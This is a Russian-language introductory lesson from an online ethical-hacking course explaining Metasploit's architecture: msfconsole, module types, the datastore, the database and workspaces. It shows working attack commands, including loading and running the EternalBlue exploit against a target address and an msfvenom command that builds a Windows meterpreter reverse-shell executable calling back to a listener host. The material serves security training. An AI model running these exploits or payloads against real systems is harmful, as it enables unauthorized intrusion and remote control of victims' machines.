0Pricing
Ethical Hacking Academy · Урок

Архитектура Metasploit

Модули и консоль

«Архитектура Metasploit» — бесплатный урок Ethical Hacking Academy на CoddyKit. Это урок 1 из 4. Ты можешь прочитать весь урок бесплатно ниже — а потом практиковать его прямо в браузере с встроенным редактором кода и ИИ-репетитором 24/7. Это часть пути обучения Ethical Hacking Academy, и твой прогресс синхронизируется между веб-версией и приложением CoddyKit. Курс Ethical Hacking Academy содержит 4 уроков всего.

Что такое Metasploit?

Metasploit — наиболее широко используемая платформа для эксплуатации уязвимостей. Она предоставляет структурированную библиотеку эксплойтов, полезных нагрузок и инструментов для проверки и демонстрации уязвимостей в рамках разрешённых работ.

Вместо того чтобы писать каждую атаку с нуля, вы загружаете проверенные модули, настраиваете их и запускаете через единый интерфейс.

msfconsole

Основной интерфейс — msfconsole, интерактивная оболочка командной строки. Она поддерживает автодополнение, историю команд и доступ ко всем модулям.

Вы запускаете её из терминала, а затем полностью работаете внутри её командной строки.

msfconsole
# msf6 > help

Типы модулей

Metasploit организует возможности по типам модулей:

  • exploit: код, использующий уязвимость.
  • payload: код, запускаемый на цели после эксплуатации.
  • auxiliary: сканеры, фаззеры и инструменты, не доставляющие полезную нагрузку.
  • post: действия после эксплуатации на скомпрометированном узле.
  • encoder и nop: помогают полезным нагрузкам обходить обнаружение.

Именование модулей

Модули используют иерархический путь, который точно описывает их назначение. По пути можно определить тип, платформу и целевую службу.

exploit/windows/smb/ms17_010_eternalblue
# type / platform / service / specific exploit

Эксплойты и полезные нагрузки

Важно различать следующие понятия:

  • exploit — способ проникновения, взламывающий уязвимое программное обеспечение.
  • payload — действие, которое должно произойти после проникновения, например открытие оболочки.

Они используются в связке: один эксплойт может доставлять разные полезные нагрузки в зависимости от вашей цели и целевой системы.

Рабочий процесс с модулем

Работа с любым модулем выполняется по повторяемому циклу:

  • выполнить search, чтобы найти модуль;
  • выполнить use, чтобы загрузить его;
  • задать параметры, например RHOSTS и LHOST;
  • выполнить run или exploit.

Именно эта последовательность позволяет платформе масштабироваться на тысячи модулей.

use exploit/windows/smb/ms17_010_eternalblue
show options
set RHOSTS 10.10.10.5
exploit

Хранилище данных и параметры

Настройки модуля хранятся в хранилище данных. Каждый параметр может быть обязательным или необязательным.

  • RHOSTS: адрес или адреса удалённой цели.
  • RPORT: удалённый порт.
  • LHOST: ваш адрес для прослушивания обратных соединений.
  • LPORT: ваш порт для прослушивания.

Перед запуском выполните show options, чтобы увидеть требования модуля.

База данных

Metasploit интегрируется с базой данных PostgreSQL, в которой хранятся узлы, службы, собранные материалы и учётные данные, обнаруженные во время работ. Это позволяет эффективно отслеживать широкий диапазон целей.

Запустите её до запуска консоли, чтобы результаты записывались автоматически.

msfdb init
# Inside msfconsole:
# db_status   hosts   services   creds

Вспомогательные модули

Модули auxiliary выполняют полезную работу без эксплуатации уязвимостей: сканируют порты, перечисляют службы, перебирают учётные данные и проводят фаззинг.

Часто они становятся первым шагом: вы собираете необходимые сведения, прежде чем выбрать эксплойт.

use auxiliary/scanner/smb/smb_version
set RHOSTS 10.10.10.0/24
run

msfvenom

msfvenom — вспомогательный инструмент для создания автономных полезных нагрузок в виде файлов: исполняемых файлов, скриптов или шелл-кода, который доставляется вне консоли.

Он объединяет создание и кодирование полезной нагрузки в одной команде и полезен для имитации фишинга или специальной доставки в рамках разрешённых проверок.

msfvenom -p windows/meterpreter/reverse_tcp \
  LHOST=10.10.14.2 LPORT=4444 -f exe -o shell.exe

Рабочие пространства

При работе с несколькими проектами рабочие пространства Metasploit изолируют узлы, службы и собранные материалы каждого клиента в базе данных. Вы переключаетесь между ними, поэтому данные не смешиваются между проверками.

workspace -a clientA      # add a workspace
workspace clientA         # switch to it
workspace                 # list all

Быстрая проверка

Проверьте, насколько хорошо вы усвоили типы модулей.

Итоги

Вы изучили архитектуру Metasploit:

  • msfconsole — основной интерфейс; msfvenom создаёт автономные полезные нагрузки.
  • Типы модулей: exploit, payload, auxiliary, post, encoder/nop.
  • Пути модулей кодируют тип, платформу и службу.
  • Рабочий процесс: search, use, set options, run; настройки хранятся в хранилище данных.
  • База данных PostgreSQL отслеживает узлы, службы и собранные материалы.

Далее: эффективный поиск эксплойтов и работа с ними.

Часто задаваемые вопросы

Урок «Архитектура Metasploit» бесплатный?

Да — полный текст урока «Архитектура Metasploit» бесплатно доступен здесь в веб-версии. Чтобы практиковать его интерактивно (встроенный редактор кода и ИИ-репетитор 24/7) и разблокировать остальной курс Ethical Hacking Academy, подпишись на CoddyKit PRO. Курс Ethical Hacking Academy содержит 4 уроков всего.

Чему я научусь в уроке «Архитектура Metasploit»?

Модули и консоль Ты практикуешь Ethical Hacking Academy с помощью реального кода, который запускаешь прямо в браузере, и ИИ-репетитор 24/7 отвечает на твои вопросы во время урока.

Нужен ли мне опыт, чтобы начать Ethical Hacking Academy?

Предыдущий опыт не требуется. Ethical Hacking Academy на CoddyKit структурирован для всех уровней — от новичков до продвинутых, поэтому ты можешь начать отсюда или с самого начала и учиться в своем темпе. Это урок 1 из 4.

Сколько времени занимает урок «Архитектура Metasploit»?

Большинство уроков CoddyKit занимают около 5–10 минут. Каждый из них компактный и интерактивный, поэтому ты постоянно делаешь прогресс и продолжаешь с того же места в веб-версии и приложении.

Можно ли писать и запускать код в этом уроке Ethical Hacking Academy?

Да. Каждый урок Ethical Hacking Academy включает встроенный редактор кода, поэтому ты пишешь и запускаешь реальный код прямо в браузере и получаешь моментальную обратную связь от AI — локальная установка не требуется.

Все уроки этого курса

  1. Архитектура Metasploit
  2. Поиск и использование эксплойтов
  3. Полезные нагрузки и Meterpreter
  4. Модули постэксплуатации
← Назад к Ethical Hacking Academy